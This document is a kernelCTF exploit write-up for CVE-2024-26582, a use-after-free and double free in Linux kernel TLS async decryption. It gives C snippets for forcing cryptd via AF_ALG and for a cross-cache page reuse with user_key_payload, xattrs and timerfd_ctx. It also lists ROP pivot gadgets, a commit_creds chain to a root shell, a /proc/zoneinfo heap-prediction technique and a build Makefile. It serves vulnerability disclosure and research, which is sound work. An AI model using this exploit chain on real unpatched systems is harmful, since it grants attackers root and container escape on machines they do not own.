# pocs/linux/kernelctf/CVE-2024-26582_lts/docs/exploit.md

## Setup

To trigger TLS encryption we must first configure the socket.
This is done with setsockopt() using the SOL_TLS level:

```
/* The "tls" ULP must be attached to the connected TCP socket first. */
if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0)
    err(1, "TCP_ULP");

static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
    err(1, "TLS_TX");
```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.

In the kernelCTF config, PCRYPT (the parallel crypto engine) is disabled, so our only option for triggering async crypto is CRYPTD (the software async crypto daemon).

Each crypto operation needed for TLS is usually implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).

Available drivers can be examined by looking at /proc/crypto; however, it only lists drivers from currently loaded modules. The Crypto API supports loading additional modules on demand.

As seen in the code snippet above, we don't have direct control over which crypto drivers will be used for our TLS encryption.
Drivers are selected automatically by the Crypto API based on the priority field, which is calculated internally to try to choose the "best" driver.

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

The following code causes the AES-CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type = "skcipher",
    .salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
    .salg_family = AF_ALG,
    .salg_type = "aead",
    .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa2)) < 0)
    err(1, "af_alg bind");
```

## Triggering the first free of the physical page

To free the physical pages backing the skb we only have to perform a partial read on a socket that has some TLS data available.
An order-0 page will be released to the PCP (per-CPU page freelist).
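
A minimal sketch of such a partial read (`tls_sock` and the buffer size are illustrative; the record queued on the socket must be larger than the read):

```
/* A record larger than our buffer must already be queued on tls_sock
 * (a socket with TLS_RX configured). Reading only part of it leaves the
 * decrypted skb on rx_list while its backing page is freed. */
char buf[16];
if (recv(tls_sock, buf, sizeof(buf), 0) < 0)
    err(1, "partial recv");
```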

## Reallocating released pages

Any object allocated from a cache that uses single-page slabs can be used here.

We decided to use the user_key_payload object:

```
struct user_key_payload {
struct callback_head rcu __attribute__((__aligned__(8))); /* 0 0x10 */
short unsigned int datalen; /* 0x10 0x2 */
char data[] __attribute__((__aligned__(8))); /* 0x18 0 */
};
```

Before we trigger the partial read, we allocate a fresh slab of kmalloc-256 using the [zoneinfo parsing technique](novel-techniques.md#predicting-when-a-new-heap-slab-is-going-to-be-allocated).
Then we allocate 15 more xattrs (a whole slab fits 16 objects), making sure that the next kmalloc-256 slab allocation will use our skb page from the PCP.

Finally, we allocate the key.
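
A minimal sketch of that key allocation with libkeyutils (the description and payload size are illustrative; the length is chosen so that the resulting user_key_payload lands in kmalloc-256):

```
#include <err.h>
#include <string.h>
#include <keyutils.h>

char payload[200];                /* ~24-byte header + 200 bytes stays within kmalloc-256 */
memset(payload, 'A', sizeof(payload));

key_serial_t key = add_key("user", "victim_key", payload, sizeof(payload),
                           KEY_SPEC_PROCESS_KEYRING);
if (key < 0)
    err(1, "add_key");
```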

## Triggering the double free

Reading the remaining data from the socket will release the physical page that is now used by user_key_payload objects.

## Overwriting user_key_payload objects and leaking data

The next step is to overwrite the user_key_payload with a simple_xattr:
```
struct simple_xattr {
struct list_head list; /* 0 0x10 */
char * name; /* 0x10 0x8 */
size_t size; /* 0x18 0x8 */
char value[]; /* 0x20 0 */
};
```

This has the effect of changing the datalen field of the key to a large value, giving us an out-of-bounds read.

We use this to identify a target xattr located below the key we used for the leak.
We also look through the other xattrs' next/prev pointers to determine the target xattr's location in kernel memory - we'll need it later to be able to set pointers to our payload.
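
A sketch of the out-of-bounds read through the corrupted key, using libkeyutils (the buffer size is illustrative; `key` is the key allocated earlier):

```
/* datalen now reports a huge value, so KEYCTL_READ copies memory far
 * past the original payload into our buffer. */
char leak[0x2000];
long n = keyctl_read(key, leak, sizeof(leak));
if (n < 0)
    err(1, "keyctl_read");
/* scan `leak` for simple_xattr list pointers and xattr contents */
```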

### Freeing xattr and allocating timerfd_ctx

Our chosen xattr is then replaced with a timerfd_ctx, which also belongs to kmalloc-256:

```
struct timerfd_ctx {
union {
struct hrtimer tmr __attribute__((__aligned__(8))); /* 0 0x40 */
struct alarm alarm __attribute__((__aligned__(8))); /* 0 0x78 */
} t __attribute__((__aligned__(8))); /* 0 0x78 */
ktime_t tintv; /* 0x78 0x8 */
ktime_t moffs; /* 0x80 0x8 */
wait_queue_head_t wqh; /* 0x88 0x18 */
u64 ticks; /* 0xa0 0x8 */
int clockid; /* 0xa8 0x4 */
short unsigned int expired; /* 0xac 0x2 */
short unsigned int settime_flags; /* 0xae 0x2 */
struct callback_head rcu __attribute__((__aligned__(8))); /* 0xb0 0x10 */
/* --- cacheline 3 boundary (192 bytes) --- */
struct list_head clist; /* 0xc0 0x10 */
spinlock_t cancel_lock; /* 0xd0 0x4 */
bool might_cancel; /* 0xd4 0x1 */

/* size: 216, cachelines: 4, members: 12 */
};

struct hrtimer {
struct timerqueue_node node __attribute__((__aligned__(8))); /* 0 0x20 */
ktime_t _softexpires; /* 0x20 0x8 */
enum hrtimer_restart (*function)(struct hrtimer *); /* 0x28 0x8 */
struct hrtimer_clock_base * base; /* 0x30 0x8 */
u8 state; /* 0x38 0x1 */
u8 is_rel; /* 0x39 0x1 */
u8 is_soft; /* 0x3a 0x1 */
u8 is_hard; /* 0x3b 0x1 */

/* size: 64, cachelines: 1, members: 8 */
} __attribute__((__aligned__(8)));

struct hrtimer_clock_base {
struct hrtimer_cpu_base * cpu_base; /* 0 0x8 */
unsigned int index; /* 0x8 0x4 */
clockid_t clockid; /* 0xc 0x4 */
seqcount_raw_spinlock_t seq; /* 0x10 0x4 */
struct hrtimer * running; /* 0x18 0x8 */
struct timerqueue_head active; /* 0x20 0x10 */
ktime_t (*get_time)(void); /* 0x30 0x8 */
ktime_t offset; /* 0x38 0x8 */

/* size: 64, cachelines: 1, members: 8 */
} __attribute__((__aligned__(64)));

```

### Leaking kernel base and getting RIP control

The next step is to leak the timerfd_ctx.t.tmr.function pointer to get the kernel text base.
For this pointer to be set, the timer must first be activated with timerfd_settime().
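
A sketch of allocating and arming such a timer (the clock id and timeout are illustrative):

```
#include <err.h>
#include <sys/timerfd.h>

int tfd = timerfd_create(CLOCK_REALTIME, 0);   /* allocates a timerfd_ctx in kmalloc-256 */
if (tfd < 0)
    err(1, "timerfd_create");

/* Arming the timer makes the kernel set t.tmr.function, the pointer we leak. */
struct itimerspec its = { .it_value = { .tv_sec = 1000 } };
if (timerfd_settime(tfd, 0, &its, NULL) < 0)
    err(1, "timerfd_settime");
```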

The next step is to trigger removal of the key objects and replace them with xattrs, overwriting the timerfd_ctx objects with our fake timers.

The fake timerfd_ctx is prepared in prepare_fake_timer().

Instead of using the obvious t.tmr.function for RIP control, we use base->get_time(), as it gives us code execution in syscall context instead of interrupt context.

This means we have to find a known location for our fake hrtimer_clock_base object, but fortunately we know the address of the timerfd_ctx because it's the same address we leaked from the xattr before.
We only need one pointer (get_time) from the hrtimer_clock_base, so we store the fake clock base at an unused offset inside our fake timer.

Finally, we call timerfd_gettime() on our corrupted timerfd objects to get RIP control.
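
A sketch of the final trigger (`corrupted_tfd` is whichever timerfd now overlaps a fake timer):

```
/* timerfd_gettime() ends up computing the remaining time via
 * tmr.base->get_time(), which now points at our first pivot gadget. */
struct itimerspec cur;
timerfd_gettime(corrupted_tfd, &cur);
```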

### Pivot to ROP

When get_time() is called, R12 contains a pointer to our timerfd_ctx.

The following gadgets are used to pivot to the ROP chain:

```
mov rsi, qword ptr [r12 + 0x48]
mov rdi, qword ptr [r12 + 0x50]
mov rdx, r15
mov rax, qword ptr [r12 + 0x58]
call __x86_indirect_thunk_rax

```

then

```
push rdi
jmp qword ptr [rsi + 0xf]
```

and

```
pop rsp
ret
```

which means our ROP chain is located at the address pointed to by timerfd_ctx + 0x50. We set this pointer to point into a part of the fake timerfd_ctx.

## Second pivot

At this point we have full ROP, but not much space left, so we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
Then we use a `pop rsp ; ret` gadget to pivot there.
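
A sketch of what that first-stage chain could look like (all gadget offsets, the scratch address, and the variable names are hypothetical placeholders resolved from the leaked kernel base):

```
/* Hypothetical offsets into the kernel image. */
#define POP_RDI_RET              0x01234UL   /* pop rdi ; ret */
#define POP_RSI_RET              0x02345UL   /* pop rsi ; ret */
#define POP_RDX_RET              0x03456UL   /* pop rdx ; ret */
#define COPY_USER_GENERIC_STRING 0x04567UL
#define POP_RSP_RET              0x05678UL
#define SCRATCH_RW_AREA          0x1e00000UL /* unused writable kernel area (assumption) */

uint64_t *rop = stage1;          /* points into the fake timerfd_ctx payload */
int i = 0;
rop[i++] = kbase + POP_RDI_RET;  rop[i++] = kbase + SCRATCH_RW_AREA;    /* to   */
rop[i++] = kbase + POP_RSI_RET;  rop[i++] = (uint64_t)stage2_user;      /* from */
rop[i++] = kbase + POP_RDX_RET;  rop[i++] = stage2_size;                /* len  */
rop[i++] = kbase + COPY_USER_GENERIC_STRING;
rop[i++] = kbase + POP_RSP_RET;  rop[i++] = kbase + SCRATCH_RW_AREA;    /* pivot */
```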

## Privilege escalation

Execution now happens in syscall context, so it's easy to escalate privileges with the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and return to a root shell.
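
Continuing the sketch above, the second-stage chain copied into the scratch area could start like this (the symbol offsets are placeholders, and the namespace switch and return to userspace are only indicated in comments):

```
#define INIT_CRED    0x2aaaa0UL  /* &init_cred (placeholder) */
#define COMMIT_CREDS 0x0bbbb0UL  /* commit_creds() (placeholder) */

uint64_t *rop = stage2_user;     /* buffer later copied into the kernel scratch area */
int i = 0;
rop[i++] = kbase + POP_RDI_RET;
rop[i++] = kbase + INIT_CRED;
rop[i++] = kbase + COMMIT_CREDS;  /* commit_creds(init_cred) */
/* ... same pattern for switch_task_namespaces(find_task_by_vpid(getpid()),
 * init_nsproxy), then a clean return to userspace to spawn the root shell. */
```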

# pocs/linux/kernelctf/CVE-2024-26582_lts/docs/novel-techniques.md

## Determining heap and page allocator state by parsing /proc/zoneinfo

The Linux kernel exposes a lot of information in the world-readable /proc/zoneinfo, including:

- per-node free/low/high page counters for the buddy allocator
- per-cpu cache count/high/batch counters

This can be useful in multiple ways during exploitation.

### Predicting when a new heap slab is going to be allocated

When performing a cross-cache attack, or any other technique involving reuse of physical pages by the SLUB allocator, we would like to be able to allocate our victim object from a newly allocated slab.

This is not trivial because we don't know the existing state of a given kmalloc cache - it probably already has some partial slabs and a new kmalloc will use them before allocating a new slab page.

The usual solution to this problem is to just allocate a lot of objects and hope some will eventually be allocated from the new page.
The downside is that we won't know which allocated object is the one we are interested in (the one from a new page).

There are also often limits on the number of victim objects we can create.
In an extreme case, the victim object can be a single-instance item and we only have one chance to get it allocated from the page we want.

Lastly, when exploiting a use-after-free caused by a race condition, we need to perform the reallocation as quickly as possible, and performing hundreds of allocation syscalls in the tight race window just won't work.

Even when there are no such limitations, using this technique tends to increase exploit reliability.

Parsing /proc/zoneinfo solves these problems by giving us a count of the currently available pages on our CPU, for example:
```
cpu: 0
count: 293
high: 378
batch: 63
```

Before performing our attack we prepare by allocating objects from the chosen cache (e.g. kmalloc-256) and reading /proc/zoneinfo after each allocation.
We watch for the count to decrease by the number of pages per slab (e.g. kmalloc-256 uses 1 page per slab and kmalloc-512 uses 2, but this is version and config dependent).

When we notice that decrease, it means our last allocation triggered allocation of a new slab.

Now we allocate (objects_per_slab - 1) more objects, and we can be sure that the current slab is full and the next allocation (the important one) will use a newly allocated physical page.
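
A minimal sketch of reading the per-cpu `count` value from /proc/zoneinfo (the parsing is simplified: a real exploit pins itself to one CPU and also has to pick the right zone, here we just take the first matching per-cpu entry):

```
#include <stdio.h>

/* Return the "count" field of the per-cpu pageset for target_cpu,
 * or -1 if it was not found. */
static int pcp_count(int target_cpu)
{
    FILE *f = fopen("/proc/zoneinfo", "r");
    char line[256];
    int cpu = -1, count = -1;

    while (f && fgets(line, sizeof(line), f)) {
        char *p = line;
        while (*p == ' ') p++;
        if (sscanf(p, "cpu: %d", &cpu) == 1)
            continue;
        if (cpu == target_cpu && sscanf(p, "count: %d", &count) == 1)
            break;
    }
    if (f)
        fclose(f);
    return count;
}
```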


### Predicting how many pages we have to free to trigger a PCP flush

Sometimes we want to reuse a physical page for an allocation that needs a page of a different order (e.g. we have a use-after-free object in kmalloc-512, which uses order-1 pages, and we want to reallocate it from the kmalloc-256 cache, which uses order-0 pages).

To be able to do this we have to flush our page from the PCP so it returns to the buddy allocator. To do this we need to free enough physical pages to exceed the 'high' mark of the PCP.
Parsing /proc/zoneinfo allows us to know exactly how many pages have to be freed instead of doing it blindly.
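
A sketch of the calculation, reusing pcp_count() from the previous section (pcp_high() is an analogous hypothetical helper that parses the 'high:' field):

```
int count = pcp_count(0);               /* current number of pages in the per-cpu list */
int high  = pcp_high(0);                /* PCP high watermark (hypothetical helper) */
int pages_to_free = high - count + 1;   /* freeing this many pushes count past 'high' */
```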



# pocs/linux/kernelctf/CVE-2024-26582_lts/docs/vulnerability.md

## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD]
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fd31f3996af2627106e22a9f8072764fede51161

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=32b55c5ff9103b8508c1e04bfa5a08c64e7a925f

## Affected kernel versions

Introduced in 6.0. Fixed in 6.1.78 and other stable trees.

## Affected component, subsystem

net/tls

## Description

When TLS decryption is used in async mode, tls_sw_recvmsg() tries to use zero-copy mode if possible, but this only works if the caller has enough space to receive the entire cleartext message.
For partial reads, a cleartext skb is allocated in tls_decrypt_sg() instead.

Pointers to the physical pages backing this skb are then copied into the sgvec passed to tls_do_decryption(), but the reference count on these pages is not increased.

The skb is then added to the rx_list queue.

After decryption is finished, tls_decrypt_done() calls put_page() on these pages, triggering their release, but they are still referenced in the skb in the rx_list queue.

When another tls_sw_recvmsg() call is made on the same socket, a use-after-free occurs: data is read from the released physical pages backing the skb. When all data has been read, a double free occurs as consume_skb() tries to release the already released physical pages.

# Makefile

```
INCLUDES =
LIBS = -pthread -ldl -lkeyutils
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_6.1.77.h
	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
	sudo apt-get install libkeyutils-dev
```